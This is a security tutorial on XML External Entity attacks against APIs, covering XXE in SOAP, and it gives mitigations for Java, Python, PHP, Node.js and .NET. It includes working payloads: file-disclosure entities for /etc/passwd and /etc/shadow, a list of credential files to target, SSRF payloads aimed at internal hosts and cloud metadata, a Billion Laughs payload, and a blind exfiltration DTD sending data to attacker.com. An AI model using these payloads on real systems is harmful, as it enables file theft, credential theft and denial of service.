API Security: XML External Entity (XXE) Attacks

XML External Entity (XXE) attacks exploit a feature built into the XML specification itself. When an API parses XML input from a client without disabling certain XML processing features, an attacker can make the server read local files, connect to internal systems, or cause a denial of service — all through carefully crafted XML.

XXE is especially dangerous in SOAP APIs and any REST API that accepts XML. It had its own category (A4) in the OWASP Top 10 2017, and the 2021 edition folds it into A05: Security Misconfiguration.

Understanding XML Entities

To understand XXE attacks, you first need to understand what XML entities are. An entity in XML is like a variable — a short name that represents a piece of content. When the XML parser encounters the entity, it substitutes the entity's value.

Internal XML Entity (value defined inline in the document):

<!DOCTYPE note [
  <!ENTITY greeting "Hello, World!">
]>
<note>
  <message>&greeting;</message>
</note>

Parser resolves &greeting; to "Hello, World!":
Result: <message>Hello, World!</message>

This is a normal, legitimate feature of XML.
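
The substitution can be observed by parsing the same document with Python's standard-library xml.etree.ElementTree, which expands internal entities declared in the DOCTYPE. This is a minimal sketch; the variable names are illustrative only.

```python
import xml.etree.ElementTree as ET

# The internal-entity document from above, as a string.
document = """<!DOCTYPE note [
  <!ENTITY greeting "Hello, World!">
]>
<note>
  <message>&greeting;</message>
</note>"""

root = ET.fromstring(document)

# The parser has already replaced &greeting; with its declared value.
message = root.find("message").text
print(message)
```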

External entities work the same way, but instead of substituting a fixed value, they tell the XML parser to fetch content from an external source — a file on the server, or a URL.

External XML Entity (dangerous):

<!DOCTYPE data [
  <!ENTITY filecontents SYSTEM "file:///etc/passwd">
]>
<request>
  <data>&filecontents;</data>
</request>

Parser fetches: file:///etc/passwd (a local file on the server)
Substitutes the file contents into &filecontents;

Result: <data>root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
        ...all of /etc/passwd...</data>

The server reads its own user account file and includes it in the XML it processes.
If the API reflects this content back to the attacker, the file is leaked.
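
To see how a parser distinguishes the two kinds of entity, the sketch below lists the entity declarations in a document using the EntityDeclHandler callback of Python's xml.parsers.expat. The function name declared_entities is hypothetical. No handler for external entity references is installed here, so the sketch only inspects declarations and is not expected to open the referenced file.

```python
from xml.parsers import expat


def declared_entities(xml_text):
    """Return (name, kind, target) for each entity declared in the DOCTYPE."""
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        # External entities carry a system identifier (a URI) and no inline value.
        if system_id is not None:
            found.append((name, "external", system_id))
        else:
            found.append((name, "internal", value))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


external_doc = """<!DOCTYPE data [
  <!ENTITY filecontents SYSTEM "file:///etc/passwd">
]>
<request>
  <data>&filecontents;</data>
</request>"""

print(declared_entities(external_doc))
```

An "external" entry whose target is a file:// or http:// URI is the signature of the attack described above.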

XXE in API Context

Attack Scenario: SOAP API for order processing

Normal SOAP Request:
POST /OrderService HTTP/1.1
Content-Type: text/xml

<soap:Envelope xmlns:soap="...">
  <soap:Body>
    <GetOrder>
      <OrderId>12345</OrderId>
    </GetOrder>
  </soap:Body>
</soap:Envelope>

Malicious XXE SOAP Request:
POST /OrderService HTTP/1.1
Content-Type: text/xml

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/shadow">
]>
<soap:Envelope xmlns:soap="...">
  <soap:Body>
    <GetOrder>
      <OrderId>&xxe;</OrderId>
    </GetOrder>
  </soap:Body>
</soap:Envelope>

If the XML parser is not configured securely:
  1. Parser reads /etc/shadow (the Linux password hash file), provided the
     server process has permission to read it
  2. Inserts the content into the OrderId field
  3. Server processes the query with this value
  4. Error messages or responses may reflect the file content back

Types of XXE Attacks

Type 1: File Disclosure XXE

Goal: Read files from the server's filesystem.

Interesting files to target:
  Linux:
    /etc/passwd          → User account information
    /etc/shadow          → Password hashes (if readable)
    /etc/hosts           → Internal network hostnames
    /proc/self/environ   → Environment variables (may contain secrets)
    /var/www/app/.env    → Application config with API keys, DB passwords
    ~/.ssh/id_rsa        → SSH private key (the payload needs the absolute
                           path; a file:// URI does not expand ~)

  Windows:
    C:\Windows\System32\drivers\etc\hosts
    C:\Users\Administrator\.ssh\id_rsa
    C:\inetpub\wwwroot\web.config   → IIS configuration with credentials

Type 2: Server-Side Request Forgery via XXE (SSRF)

Goal: Make the server send requests to internal systems.

Attacker-controlled XML:
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.100:8080/admin">
]>
<request>&xxe;</request>

The server fetches http://192.168.1.100:8080/admin
This is an internal IP — normally unreachable from the internet.
The server acts as a proxy for the attacker.

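Attacker can:
  → Map the internal network by trying different IPs and ports
  → Access cloud provider metadata APIs:
    http://169.254.169.254/latest/meta-data/    (AWS instance metadata)
    → Returns: instance info and temporary IAM role credentials
      (user data is served from /latest/user-data)
    → Reachable this way only through IMDSv1; IMDSv2 requires a session
      token header that an XXE payload cannot send
  → Reach internal admin panels that trust any caller on the internal network
  → Read internal API responses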
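
The targets above share one property: they sit in private, loopback, or link-local address ranges. The sketch below classifies the URI of a SYSTEM identifier using only the standard library, which is one way a log review or an egress policy could flag such targets. The function name classify_target and the three labels are assumptions made for illustration, and hostnames are deliberately left unresolved.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_target(uri):
    """Label a URI's host as 'internal', 'public', or 'unknown'."""
    host = urlsplit(uri).hostname
    if host is None:
        # For example file:///etc/passwd, which has no network host.
        return "unknown"
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name; classifying it would require resolving it first.
        return "unknown"
    if address.is_private or address.is_loopback or address.is_link_local:
        return "internal"
    return "public"


for uri in ("http://192.168.1.100:8080/admin",
            "http://169.254.169.254/latest/meta-data/",
            "http://8.8.8.8/"):
    print(uri, "->", classify_target(uri))
```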

Type 3: Billion Laughs (XML Denial of Service)

Goal: Crash the XML parser through exponential entity expansion.

The "Billion Laughs" attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  ... (up to lol9)
]>
<lolz>&lol9;</lolz>

Each level repeats the previous one ten times, so lol9 expands to 10^9 copies of "lol"
= 1 billion "lol" strings = ~3 GB of data from a tiny XML input

Parser tries to hold this in memory → Out of memory error → Crash
This is a Denial of Service attack using less than a kilobyte of input.
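
The size of the expansion can be worked out without ever parsing the payload. The sketch below is plain arithmetic: each nesting level multiplies the text by the fan-out, so k levels of tenfold nesting yield 10^k copies. The function name expanded_bytes is hypothetical.

```python
def expanded_bytes(base, fanout, levels):
    """Bytes produced when `base` is repeated `fanout` times per nesting level."""
    return len(base.encode("utf-8")) * fanout ** levels


# Nine levels of tenfold nesting around the 3-byte string "lol".
total = expanded_bytes("lol", 10, 9)
print(total, "bytes, about", round(total / 1e9, 1), "GB")
```

Adding one more level multiplies the result by ten again, which is why parsers that allow entity expansion need a hard limit on it.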

Type 4: Blind XXE via Out-of-Band Channels

Goal: Exfiltrate data when no response content is reflected.

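Technique: Use DNS or HTTP to carry data to attacker's server.

Request sent to the API:
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>test</foo>

evil.dtd, hosted on the attacker's server:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; oob SYSTEM 'http://attacker.com/?data=%file;'>">
%wrap;
%oob;

The payload lives in an external DTD because the XML specification does not
allow a parameter entity reference inside another declaration in the
document's own DOCTYPE.

The parser:
  1. Fetches evil.dtd from the attacker's server
  2. Reads /etc/passwd into %file
  3. Makes HTTP request to attacker.com with file contents as parameter
  4. Attacker's server logs the request and receives the file data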

Attacker never sees it in the API response.
They check their own server's logs.

The Fix: Disable External Entity Processing

The solution to XXE is disabling external entity processing in the XML parser. This is a simple configuration change but it is frequently forgotten.

Java (DocumentBuilderFactory):
  DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
  factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
  factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
  factory.setXIncludeAware(false);
  factory.setExpandEntityReferences(false);

Python (lxml):
  from lxml import etree
  parser = etree.XMLParser(
      resolve_entities=False,
      no_network=True,
      load_dtd=False
  )
  tree = etree.fromstring(xml_input, parser)

Python (defusedxml — recommended):
  import defusedxml.ElementTree as ET
  tree = ET.fromstring(xml_input)
  # defusedxml blocks XXE, billion laughs, and other XML attacks by default

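PHP:
  // Only needed before PHP 8.0. The function is deprecated in 8.0, where
  // libxml 2.9+ already disables external entity loading by default.
  if (\PHP_VERSION_ID < 80000) {
      libxml_disable_entity_loader(true);
  }
  $doc = new DOMDocument();
  // Do not pass LIBXML_NOENT or LIBXML_DTDLOAD: they turn entity
  // substitution and external DTD loading back on.
  $doc->loadXML($xml, LIBXML_NONET);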

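Node.js (libxmljs):
  const libxmljs = require('libxmljs');
  // noent: false leaves entity references unexpanded; nonet: true blocks network access
  const doc = libxmljs.parseXml(xml, { noent: false, nonet: true });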

.NET:
  XmlReaderSettings settings = new XmlReaderSettings();
  settings.DtdProcessing = DtdProcessing.Prohibit;
  settings.XmlResolver = null;
  XmlReader reader = XmlReader.Create(stream, settings);
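
Python (standard library xml.sax):

The standard-library SAX parser exposes the same two switches as the Java example above. Since Python 3.7.1 external general entities are off by default, so the setFeature calls below mainly make the intent explicit. This is a sketch under those assumptions; TextCollector and extract_text are hypothetical names.

```python
import io
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes)


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def extract_text(xml_bytes):
    parser = xml.sax.make_parser()
    # Refuse to resolve external general and parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


print(extract_text(b"<order><id>12345</id></order>"))
```

With these settings an external entity reference is expected to be skipped rather than replaced by file contents. A dedicated library such as defusedxml remains the more complete option because it also rejects entity expansion attacks.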

Defense in Depth for XXE

Layer 1: Disable external entities in XML parser (PRIMARY — do this always)
Layer 2: Disable DTD processing entirely if not needed
Layer 3: Switch to JSON where possible (JSON has no entity concept)
Layer 4: Use allowlist input validation on XML content
Layer 5: Network egress controls — block outbound connections
         from server to prevent SSRF via XXE
Layer 6: WAF rules to detect DOCTYPE and ENTITY in requests
Layer 7: Run XML processing in a sandboxed environment
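
Layer 2 can be sketched with the standard library alone: a first pass with xml.parsers.expat aborts as soon as a DOCTYPE declaration starts, and only DTD-free input reaches the real parser. The names DoctypeForbidden and parse_without_dtd are hypothetical. For SOAP endpoints this costs nothing, since SOAP 1.1 already states that a message must not contain a Document Type Declaration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when client XML contains a DOCTYPE declaration."""


def parse_without_dtd(xml_bytes):
    def reject(name, system_id, public_id, has_internal_subset):
        # Raised before any entity in the DTD is declared or expanded.
        raise DoctypeForbidden("DOCTYPE declarations are not accepted")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject
    checker.Parse(xml_bytes, True)  # the exception propagates out of Parse

    # Only reached for documents without a DOCTYPE.
    return ET.fromstring(xml_bytes)


order = parse_without_dtd(b"<GetOrder><OrderId>12345</OrderId></GetOrder>")
print(order.find("OrderId").text)
```

Because the check fires on the DOCTYPE itself, it stops file disclosure, SSRF, blind exfiltration, and Billion Laughs payloads alike.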

Identifying XXE Vulnerability in Your API

Indicators that an endpoint may be vulnerable:

1. Endpoint accepts Content-Type: text/xml or application/xml
2. SOAP service that processes client-supplied XML bodies
3. API that accepts file uploads including .xml, .docx, .xlsx, .svg
   (SVG is XML; .docx and .xlsx are ZIP archives of XML parts, so a parser may be triggered)
4. API that processes SVG files, for example to render or resize them (XXE works in SVG)
5. API using Excel/Word processing libraries on uploaded files
   (These parse the embedded XML parts and are vulnerable if not hardened)
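
To check whether an uploaded office document will reach an XML parser, it helps to look inside it. The sketch below treats the upload as a ZIP archive and lists the members that look like XML. The function name xml_parts and the suffix list are assumptions made for illustration, not an exhaustive rule.

```python
import io
import zipfile

# Suffixes that commonly hold XML inside office-style archives (an assumption).
XML_SUFFIXES = (".xml", ".rels", ".svg")


def xml_parts(upload):
    """Return the names of XML-looking members inside a ZIP-based upload."""
    buffer = io.BytesIO(upload)
    if not zipfile.is_zipfile(buffer):
        return []
    with zipfile.ZipFile(buffer) as archive:
        return [name for name in archive.namelist()
                if name.lower().endswith(XML_SUFFIXES)]


# Build a tiny stand-in for a .docx upload in memory.
sample = io.BytesIO()
with zipfile.ZipFile(sample, "w") as archive:
    archive.writestr("word/document.xml", "<document/>")
    archive.writestr("word/media/image1.png", b"\x89PNG")

print(xml_parts(sample.getvalue()))
```

Every name returned is a document that some library will hand to an XML parser, so each one is covered by the same hardening requirements as a direct XML request body.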

Testing: Send a request with a simple XXE payload and observe behavior.
Test only systems you own or are explicitly authorized to test.

Real-World XXE Incidents

XXE vulnerabilities have been reported in widely used software and services. Security researchers found an XXE vulnerability in Facebook's career portal that allowed reading of server files. A well-known XXE vulnerability in Adobe Reader affected how the software processed XML, allowing attackers to read local files. Multiple enterprise applications, including some SAML authentication implementations, were found vulnerable to XXE because SAML messages are XML documents: an attacker who can submit a crafted SAML assertion can exploit XXE in the parser of whichever party consumes it, typically the service provider.

Key Points

XXE attacks exploit the XML external entity feature to make servers read local files or connect to internal services.
The four main attack types are file disclosure, SSRF via XXE, denial of service (Billion Laughs), and blind out-of-band exfiltration.
The fix is simple: disable external entity processing in the XML parser configuration. Use a library like defusedxml in Python for automatic protection.
File formats like SVG, DOCX, XLSX, and XML data feeds are all potential XXE attack vectors if processed without secure parser settings.
Consider switching from XML to JSON where possible — JSON has no entity concept and is immune to XXE.
SSRF via XXE can expose cloud provider metadata APIs, leaking IAM credentials and instance information.
